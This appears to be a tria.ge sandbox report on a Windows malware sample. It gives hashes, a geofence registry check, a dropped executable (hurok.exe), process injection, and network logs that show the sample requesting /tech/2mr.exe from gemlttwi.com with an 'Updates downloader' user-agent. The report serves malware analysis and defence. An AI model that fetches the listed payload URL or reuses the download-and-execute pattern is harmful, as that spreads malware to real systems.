Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
142s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
10/07/2023, 16:08 UTC
Static task
static1
Behavioral task
behavioral1
Sample
d19312ee85bd12exeexeexeex.exe
Resource
win7-20230703-en
Behavioral task
behavioral2
Sample
d19312ee85bd12exeexeexeex.exe
Resource
win10v2004-20230703-en
General
-
Target
d19312ee85bd12exeexeexeex.exe
-
Size
42KB
-
MD5
d19312ee85bd1234950bac0c5ba1e894
-
SHA1
eda2ad1051c2f656411c47bee5727ef347fbb81e
-
SHA256
edb81fb6bc2cd5b8d32e0e8389d36e2e5acc9de7c97f898036731f06e7bad979
-
SHA512
abb42a90d13c496b9866122c26f084cafae853f8b6429c112be00124bcaa61a7bfc8ceca1f17002fa2badfccbe8ac2bdc00b8d07840e028d554fbbbdb94dfc19
-
SSDEEP
768:Kf1K2exg2kBwtdgI2MyzNORQtOflIwoHNV2XBFV72BOlA7ZsBGGpebVIYLHA3KxG:o1KhxqwtdgI2MyzNORQtOflIwoHNV2Xb
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\Control Panel\International\Geo\Nation d19312ee85bd12exeexeexeex.exe Key value queried \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\Control Panel\International\Geo\Nation hurok.exe -
Executes dropped EXE 1 IoCs
pid Process 4888 hurok.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 372 wrote to memory of 4888 372 d19312ee85bd12exeexeexeex.exe 84 PID 372 wrote to memory of 4888 372 d19312ee85bd12exeexeexeex.exe 84 PID 372 wrote to memory of 4888 372 d19312ee85bd12exeexeexeex.exe 84
Processes
-
C:\Users\Admin\AppData\Local\Temp\d19312ee85bd12exeexeexeex.exe"C:\Users\Admin\AppData\Local\Temp\d19312ee85bd12exeexeexeex.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:372 -
C:\Users\Admin\AppData\Local\Temp\hurok.exe"C:\Users\Admin\AppData\Local\Temp\hurok.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:4888
-
Network
-
Remote address:8.8.8.8:53Request76.32.126.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestgemlttwi.comIN AResponsegemlttwi.comIN A192.185.35.56
-
Remote address:192.185.35.56:443RequestGET /tech/2mr.exe HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: gemlttwi.com
Cache-Control: no-cache
ResponseHTTP/1.1 404 Not Found
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <https://gemlttwi.com/wp-json/>; rel="https://api.w.org/"
Upgrade: h2,h2c
Connection: Upgrade
Vary: Accept-Encoding
X-Endurance-Cache-Level: 2
X-nginx-cache: WordPress
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
-
Remote address:8.8.8.8:53Request56.35.185.192.in-addr.arpaIN PTRResponse56.35.185.192.in-addr.arpaIN PTRimmacbytescom
-
Remote address:8.8.8.8:53Request101.14.18.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request101.15.18.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request254.178.238.8.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request45.8.109.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request88.156.103.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request69.121.18.2.in-addr.arpaIN PTRResponse69.121.18.2.in-addr.arpaIN PTRa2-18-121-69deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request84.65.42.20.in-addr.arpaIN PTRResponse
-
4.7kB 115.3kB 92 89
HTTP Request
GET https://gemlttwi.com/tech/2mr.exeHTTP Response
404
-
71 B 157 B 1 1
DNS Request
76.32.126.40.in-addr.arpa
-
58 B 74 B 1 1
DNS Request
gemlttwi.com
DNS Response
192.185.35.56
-
72 B 100 B 1 1
DNS Request
56.35.185.192.in-addr.arpa
-
72 B 134 B 1 1
DNS Request
101.14.18.104.in-addr.arpa
-
72 B 134 B 1 1
DNS Request
101.15.18.104.in-addr.arpa
-
72 B 126 B 1 1
DNS Request
254.178.238.8.in-addr.arpa
-
70 B 144 B 1 1
DNS Request
45.8.109.52.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
88.156.103.20.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
69.121.18.2.in-addr.arpa
-
70 B 156 B 1 1
DNS Request
84.65.42.20.in-addr.arpa
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
42KB
MD541d38f31bce6e04f6432f6c1178d5b57
SHA19b01ff342c14b85bc823f02a8e3555e0cd043fff
SHA25674325a720813e28270ee1c03aedf73c3cd0b23988ad2b2d9326777a25db2ad6e
SHA512c3d070e43db73662ef063c9aa3ed5bbdb8aa9c563821de342853707a16b96c7dc27af80647e6543e6292c2c80dd682f268c58a5edbba5233f50b657b3d6b0036
-
Filesize
42KB
MD541d38f31bce6e04f6432f6c1178d5b57
SHA19b01ff342c14b85bc823f02a8e3555e0cd043fff
SHA25674325a720813e28270ee1c03aedf73c3cd0b23988ad2b2d9326777a25db2ad6e
SHA512c3d070e43db73662ef063c9aa3ed5bbdb8aa9c563821de342853707a16b96c7dc27af80647e6543e6292c2c80dd682f268c58a5edbba5233f50b657b3d6b0036
-
Filesize
42KB
MD541d38f31bce6e04f6432f6c1178d5b57
SHA19b01ff342c14b85bc823f02a8e3555e0cd043fff
SHA25674325a720813e28270ee1c03aedf73c3cd0b23988ad2b2d9326777a25db2ad6e
SHA512c3d070e43db73662ef063c9aa3ed5bbdb8aa9c563821de342853707a16b96c7dc27af80647e6543e6292c2c80dd682f268c58a5edbba5233f50b657b3d6b0036